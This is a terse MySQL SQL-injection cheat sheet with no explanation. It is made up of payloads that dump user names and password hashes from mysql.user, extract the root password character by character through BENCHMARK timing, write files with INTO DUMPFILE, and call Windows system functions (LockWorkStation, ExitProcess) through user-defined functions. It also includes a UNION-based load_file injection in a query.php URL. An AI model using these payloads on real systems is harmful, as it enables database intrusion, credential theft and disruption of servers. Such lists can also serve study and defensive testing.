SELECT USER,Password FROM mysql.user; SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) USER,Password FROM mysql.user WHERE USER = 'root';
Write query into a new file (can not modify existing files):
SELECT ... INTO DUMPFILE
CREATE FUNCTION LockWorkStation RETURNS INTEGER SONAME 'user32'; SELECT LockWorkStation(); CREATE FUNCTION ExitProcess RETURNS INTEGER SONAME 'kernel32'; SELECT exitprocess(); SELECT USER(); SELECT password,USER() FROM mysql.user;
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
query.php?USER=1+UNION+SELECT+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1